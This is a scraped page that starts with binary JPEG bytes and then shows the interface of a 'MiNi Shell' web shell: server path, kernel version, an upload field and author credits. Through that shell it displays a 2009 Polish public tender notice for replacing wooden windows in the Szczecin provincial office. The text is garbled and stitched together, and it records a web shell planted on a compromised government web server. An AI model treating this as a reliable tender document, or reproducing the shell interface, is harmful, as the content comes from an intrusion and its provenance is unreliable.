JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090708/228840-N-2009.html

<p class="kh_header"><b>Szczecin: WYMIANA STOLARKI OKIENNEJ DREWNIANEJ W  BUDYNKU ZACHODNIOPOMORSKIEGIO URZĘDU  WOJEWÓDZKIEGO
W  SZCZECINIE</b><br>
<b>Numer ogłoszenia: 228840 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Obsługi Administracji Zachodniopomorskiego Urzędu Wojewódzkiego w Szczecinie , ul. Wały Chrobrego 4, 70-502 Szczecin, woj. zachodniopomorskie, tel. 091 4303439, 4303465, faks 091 4303606.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> http://www.szczecin.uw.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA STOLARKI OKIENNEJ DREWNIANEJ W  BUDYNKU ZACHODNIOPOMORSKIEGIO URZĘDU  WOJEWÓDZKIEGO
W  SZCZECINIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robot budowlanych polegających na wymianie części 	stolarki okiennej drewnianej oraz jednych drzwi zewnętrznych w budynku Zachodniopomorskiego Urzędu Wojewódzkiego w Szczecinie przy ul. Wały Chrobrego 4. 

Zakres robót obejmuje:

1.Wymianę części stolarki okiennej na nowe okna z ramami drewnianymi klejonymi trójwarstwowo z drewna red meranti, barwionego w kolorze brązowym takim jak w wymienionych już oknach w tych elewacjach, skrzydła okienne uchylne z mikrouchyłem, szklone szybami zespolonymi ze szkła typu float ze współczynnikiem przenikania ciepła U = 1,1 W/m2K oraz współczynnikiem izolacyjności akustycznej Rw = 32 dB.  Wymiany należy dokonać wg projektu architektoniczno-budowlanego: -Wymiana okien w budynku Zachodniopomorskiego Urzędu Wojewódzkiego w Szczecinie-(załącznik nr 8) w następujących lokalizacjach:


1)Parter niski, elewacje: F, G, H od strony ulicy Szczerbcowej (rys. nr 3):
	okna O 41   - szt. 2 (rys. nr 14)
             okna O 41a - szt. 2 (rys. nr 14)
	okna O 44   - szt. 7 (rys. nr 15)
	okna O 45c - szt. 2 (rys. nr 15)
	okna O 46   - szt. 2 (rys. nr 15)

2)Parter wysoki, elewacje: F, G, H od strony ulicy Szczerbcowej (rys. nr 4):
	okna O 6b  - szt. 3 (rys. nr 8)
	okno O 6f   - szt. 1 (rys. nr 8)
	okna O 9c   - szt. 9 (rys. nr 9)
	okna O 20a - szt. 3 (rys. nr 12)
	okna O 34   - szt. 2 (rys. nr 13)
	okna O 34a - szt. 2 (rys. nr 13)
	okno O 36   - szt. 1 (rys. nr 13)

3)  Pierwsze piętro, elewacje F, G od strony ulicy Szczerbcowej (rys. nr 5):
	okna O 6b - szt. 2 (rys. nr 8)
	okna O 9c - szt. 6 (rys. nr 9)

4)  Drugie piętro, elewacja G od strony ulicy Szczerbcowej (rys. nr 6):
	okna O 6   - szt. 3 (rys. nr 8)
	okna O 6a - szt. 2 (rys. nr 8)
	okna O 9   - szt. 4 (rys. nr 9)

5)  Trzecie piętro, elewacja G od strony ulicy Szczerbcowej (rys. nr 7):
	okna O 6   - szt. 3 (rys. nr 8)
	okna O 6a - szt. 4 (rys. nr 8)

6)  Okna w szczycie SZ5, elewacja G od strony ul. Szczerbcowej (rys. nr 16):
	okna OS 2a - szt. 3 (rys. nr 17)
	okno OS 3   - szt. 1 (rys. nr 17)

2.Wymianę jednych drzwi zewnętrznych metalowych od strony ul. Szczerbcowej, prowadzących z dziedzińca wewnętrznego do budynku Zachodniopomorskiego Urzędu Wojewódzkiego (lokalizacja: załącznik nr 6) - na nowe drzwi drewniane z drewna red meranti w kolorze brązowym, identycznym z kolorem stolarki okiennej opisanej w punkcie 1, zgodnie z rysunkiem stanowiącym załącznik nr 9.
Szczegółowy opis robót:
Ad. 1.:
- zabezpieczenie podłogi i mebli w pokojach biurowych folią, 
- zabezpieczenie korytarzy w miejscach robót folią,
- demontaż istniejących okien i parapetów wewnętrznych wraz z ich  
   wywózką   i utylizacją,
- demontaż istniejących drewnianych rolkokaset (skrzynki na żaluzje) 
   wraz   z ich wywózką i utylizacją - dotyczy okien: O 6, O 6a, O 6b, O 6f, 
   O 9, O 9c,
- dostawa i montaż nowych okien wykonanych z drewna red meranti 
   (jedno  okno O 41 znajdujące się w pomieszczeniu oznaczonym nr 
   070a, zlokalizowanym na poziomie parteru niskiego, należy wykonać wraz
   z osadzeniem i podłączeniem wentylatora elektrycznego - tak jak jest to 
   wykonane w istniejącym oknie),
- dostawa i montaż parapetów wewnętrznych płytowych (postforming) w   
  kolorze  stolarki okiennej,
- wykonanie zabudowy wnęk po zdemontowanych rolkokasetach 
  (skrzynkach na żaluzje) płytą g-k na ruszcie o wymiarach: szerokość jak 
  szerokość okien, wysokość ok. 40 cm, głębokość ok. 20 cm (zlicować ze 
  ścianą)  z wypełnieniem pustych przestrzeni styropianem,
- wykonanie obróbek tynkarskich ościeży okiennych płytą g-k z 
  wypełnieniem pustych przestrzeni styropianem oraz wykonanie obróbek
  tynkarskich pod parapetami, bez malowania,
- uszczelnienie styku ramy okiennej z murem zewnętrznym silikonem wg  
   wskazań Zamawiającego,
- harmonogram dostaw i montażu okien musi być uzgodniony z 
    Zamawiającym 	po zawarciu umowy na wykonanie robót.

Ad. 2.:
- demontaż istniejących drzwi metalowych wraz z ościeżnicą (bez ich       
   wywozu i utylizacji),
-  dostawa i montaż nowych drzwi drewnianych wykonanych z drewna red 
   meranti z ozdobnym naświetlem ze szkła, wyposażonych w dwa zamki z 
    wkładką patentową, samozamykacz, trzy zawiasy oraz trzy 
   bolce antywyważeniowe,
- wykonanie obróbek tynkarskich ościeży, bez malowania.

Przed realizacją zamówienia Wykonawca dokona szczegółowych pomiarów wymienianej stolarki. Kształt, podziały i sposób otwierania okien wg. projektu architektoniczno-budowlanego  (załącznik nr 8 do SIWZ ). 

Szczegółowy opis robót związanych z wymianą stolarki okiennej został określony w projekcie architektoniczno - budowlanym (załącznik nr 8) i specyfikacji technicznej wykonania i odbioru robót budowlanych (załącznik nr 5), stanowiących integralną część Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.21.00-2, 45.42.11.32-8, 45.42.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych, tj.:

- Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
- Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
-Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
-Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodów, o których mowa w art. 24 ustawy.
					
2. Wykażą się odpowiednim doświadczeniem, tj. w ciągu ostatnich pięciu lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali minimum jedną (1) robotę budowlaną polegającą na wymianie stolarki okiennej drewnianej lub roboty budowlane, w skład, których wchodziła wymiana stolarki okiennej drewnianej, o wartości nie mniejszej niż 100.000,- zł brutto. 		         3.Wykażą się dysponowaniem osobami zdolnymi do wykonania zamówienia tj. dysponują jedną osobą, która pełnić będzie funkcje kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi i, że osoba wskazana jako kierownik budowy wpisana jest na listę członków właściwej izby samorządu            zawodowego.  						
Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą (spełnia - nie spełnia), w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w części 6 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnił ww. warunki..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji 	działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania ofert przez Wykonawców występujących wspólnie ww. 	dokumenty muszą być złożone przez każdego Wykonawcę (dot. również S.C.).
2)Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1  ustawy (Załącznik nr 2).

3)Wykaz wykonanej przez Wykonawcę w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia a jeśli okres prowadzenia działalności jest krótszy - w tym okresie  minimum jednej (1) roboty budowlanej polegającej na wymianie stolarki okiennej drewnianej lub roboty budowlanej, w skład której wchodziła wymiana stolarki okiennej  drewnianej, o wartości nie mniejszej niż 100.000,- zł brutto wraz z dokumentami potwierdzającymi, że zamówienie zostało  zrealizowane  należycie np. referencje (Załącznik nr 4 do SIWZ ).	
						
4)Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w  wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych,  doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu   wykonywanych przez nie czynności (Załącznik nr 3 do SIWZ). 					
5)Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium RP zamiast dokumentów   wskazanych w części 6 pkt 6.1 SIWZ składają odpowiedni dokument lub dokumenty wystawione w kraju, w którym mają siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:

-nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
-nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.,
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa pkt 6.1.SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym z zachowaniem terminów określonych powyżej w pkt. 6.5.SIWZ
Wszelkie dokumenty w języku obcym muszą zostać złożone wraz z tłumaczeniem na język polski, a Zamawiający podczas analizy ich treści będzie się opierał na tekście przetłumaczonym

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Umocowanie pełnomocnika może również wynikać z treści innego dokumentu dołączonego do oferty.
								
Pełnomocnictwo, o którym mowa wyżej winno być pełnomocnictwem rodzajowym i odpowiadać  wymogom określonym  w przepisach kodeksu cywilnego. W swojej treści winno wskazywać mocodawcę ( osobę fizyczną lub prawną) na rzecz i w imieniu, którego działa wskazany pełnomocnik (osoba fizyczna lub prawna) oraz określać zakres umocowania pełnomocnika do reprezentowania mocodawcy w postępowaniu o udzielenie niniejszego zamówienia lub reprezentowania w postępowaniu oraz zawarcia umowy o udzielenie zamówienia publicznego.	
				
Przyjmuje się, że jeśli wynika to z treści pełnomocnictwa do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, to obejmuje ono uprawnienie pełnomocnika do potwierdzenia za zgodność wszystkich dokumentów złożonych w niniejszym postępowaniu przez tych wykonawców. Dokumenty dotyczące konkretnego wykonawcy ubiegającego się o zamówienie w ramach konsorcjum lub spółki cywilnej, mogą również być potwierdzone za zgodność przez osobę uprawnioną do reprezentacji tego wykonawcy.	
Oferta spółki winna zawierać wszystkie wymagane dokumenty i oświadczenia wymienione w  pkt  6.1-6.2 SIWZ osobno dla każdego z jej wspólników,  pozostałe dokumenty składane są wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.szczecin.uw.gov.pl ,Przetargi /Zamówienia publiczne.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Obsługi Administracji Zachodniopomorskiego Urzędu Wojewódzkiego w Szczecinie, ul. Wały Chrobrego 4, 70-502 Szczecin, I piętro pok. 189..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 09:00, miejsce: Sekretariat Zakładu Obsługi Administracji Zachodniopomorskiego Urzędu Wojewódzkiego w Szczecinie, ul. Wały Chrobrego 4, 70-502 Szczecin, I piętro 
pok. 189..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com